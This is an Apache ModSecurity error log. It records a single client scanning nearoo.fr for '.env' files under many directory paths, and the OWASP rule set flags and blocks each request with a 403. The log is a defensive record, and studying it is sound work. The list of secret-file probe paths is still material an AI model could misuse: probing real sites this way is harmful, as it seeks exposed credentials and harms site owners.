[Mon May 11 17:36:11.104772 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/microservice/.env"] [unique_id "agH3a_y_GXSWIKeli0sNpwAAAIE"]
[Mon May 11 17:36:11.105068 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/microservice/.env"] [unique_id "agH3a_y_GXSWIKeli0sNpwAAAIE"]
[Mon May 11 17:36:11.418650 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /service/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/service/.env"] [unique_id "agH3a_y_GXSWIKeli0sNqAAAAIE"]
[Mon May 11 17:36:11.418990 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/service/.env"] [unique_id "agH3a_y_GXSWIKeli0sNqAAAAIE"]
[Mon May 11 17:36:11.419350 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/service/.env"] [unique_id "agH3a_y_GXSWIKeli0sNqAAAAIE"]
[Mon May 11 17:36:11.679243 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v3/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/api/v3/.env"] [unique_id "agH3a_y_GXSWIKeli0sNqgAAAIE"]
[Mon May 11 17:36:11.679571 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/api/v3/.env"] [unique_id "agH3a_y_GXSWIKeli0sNqgAAAIE"]
[Mon May 11 17:36:11.679916 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/api/v3/.env"] [unique_id "agH3a_y_GXSWIKeli0sNqgAAAIE"]
[Mon May 11 17:36:11.952024 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/api/dev/.env"] [unique_id "agH3a_y_GXSWIKeli0sNqwAAAIE"]
[Mon May 11 17:36:11.952291 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/api/dev/.env"] [unique_id "agH3a_y_GXSWIKeli0sNqwAAAIE"]
[Mon May 11 17:36:11.952553 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/api/dev/.env"] [unique_id "agH3a_y_GXSWIKeli0sNqwAAAIE"]
[Mon May 11 17:36:11.967344 2026] [ssl:error] [pid 1411099:tid 1411118] (EAI 2)Name or service not known: [client 137.184.91.169:35300] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 17:36:11.967379 2026] [ssl:error] [pid 1411099:tid 1411118] AH01941: stapling_renew_response: responder error
[Mon May 11 17:36:12.905441 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/api/staging/.env"] [unique_id "agH3bFV4kyjgo4bQBUhuSQAAANM"]
[Mon May 11 17:36:12.905677 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/api/staging/.env"] [unique_id "agH3bFV4kyjgo4bQBUhuSQAAANM"]
[Mon May 11 17:36:12.906302 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/api/staging/.env"] [unique_id "agH3bFV4kyjgo4bQBUhuSQAAANM"]
[Mon May 11 17:36:13.207499 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/vendor/.env"] [unique_id "agH3bVV4kyjgo4bQBUhuSgAAANM"]
[Mon May 11 17:36:13.207732 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/vendor/.env"] [unique_id "agH3bVV4kyjgo4bQBUhuSgAAANM"]
[Mon May 11 17:36:13.207986 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/vendor/.env"] [unique_id "agH3bVV4kyjgo4bQBUhuSgAAANM"]
[Mon May 11 17:36:13.394958 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/lib/.env"] [unique_id "agH3bVV4kyjgo4bQBUhuTAAAANM"]
[Mon May 11 17:36:13.395210 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/lib/.env"] [unique_id "agH3bVV4kyjgo4bQBUhuTAAAANM"]
[Mon May 11 17:36:13.395469 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/lib/.env"] [unique_id "agH3bVV4kyjgo4bQBUhuTAAAANM"]
[Mon May 11 17:36:13.609014 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /resources/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/resources/.env"] [unique_id "agH3bVV4kyjgo4bQBUhuTQAAANM"]
[Mon May 11 17:36:13.609241 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/resources/.env"] [unique_id "agH3bVV4kyjgo4bQBUhuTQAAANM"]
[Mon May 11 17:36:13.609483 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/resources/.env"] [unique_id "agH3bVV4kyjgo4bQBUhuTQAAANM"]
[Mon May 11 17:36:14.048980 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/assets/.env"] [unique_id "agH3blV4kyjgo4bQBUhuTwAAANM"]
[Mon May 11 17:36:14.049217 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/assets/.env"] [unique_id "agH3blV4kyjgo4bQBUhuTwAAANM"]
[Mon May 11 17:36:14.049455 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/assets/.env"] [unique_id "agH3blV4kyjgo4bQBUhuTwAAANM"]
[Mon May 11 17:36:14.249618 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/uploads/.env"] [unique_id "agH3blV4kyjgo4bQBUhuUAAAANM"]
[Mon May 11 17:36:14.249854 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/uploads/.env"] [unique_id "agH3blV4kyjgo4bQBUhuUAAAANM"]
[Mon May 11 17:36:14.250107 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/uploads/.env"] [unique_id "agH3blV4kyjgo4bQBUhuUAAAANM"]
[Mon May 11 17:36:14.435951 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /internal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/internal/.env"] [unique_id "agH3blV4kyjgo4bQBUhuUgAAANM"]
[Mon May 11 17:36:14.436205 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/internal/.env"] [unique_id "agH3blV4kyjgo4bQBUhuUgAAANM"]
[Mon May 11 17:36:14.436473 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/internal/.env"] [unique_id "agH3blV4kyjgo4bQBUhuUgAAANM"]
[Mon May 11 17:36:14.621396 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/tools/.env"] [unique_id "agH3blV4kyjgo4bQBUhuUwAAANM"]
[Mon May 11 17:36:14.621619 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/tools/.env"] [unique_id "agH3blV4kyjgo4bQBUhuUwAAANM"]
[Mon May 11 17:36:14.621876 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/tools/.env"] [unique_id "agH3blV4kyjgo4bQBUhuUwAAANM"]
[Mon May 11 17:36:14.860251 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /scripts/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/scripts/.env"] [unique_id "agH3blV4kyjgo4bQBUhuVAAAANM"]
[Mon May 11 17:36:14.860474 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/scripts/.env"] [unique_id "agH3blV4kyjgo4bQBUhuVAAAANM"]
[Mon May 11 17:36:14.860717 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/scripts/.env"] [unique_id "agH3blV4kyjgo4bQBUhuVAAAANM"]
[Mon May 11 17:36:15.052128 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/bin/.env"] [unique_id "agH3b1V4kyjgo4bQBUhuVQAAANM"]
[Mon May 11 17:36:15.052372 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/bin/.env"] [unique_id "agH3b1V4kyjgo4bQBUhuVQAAANM"]
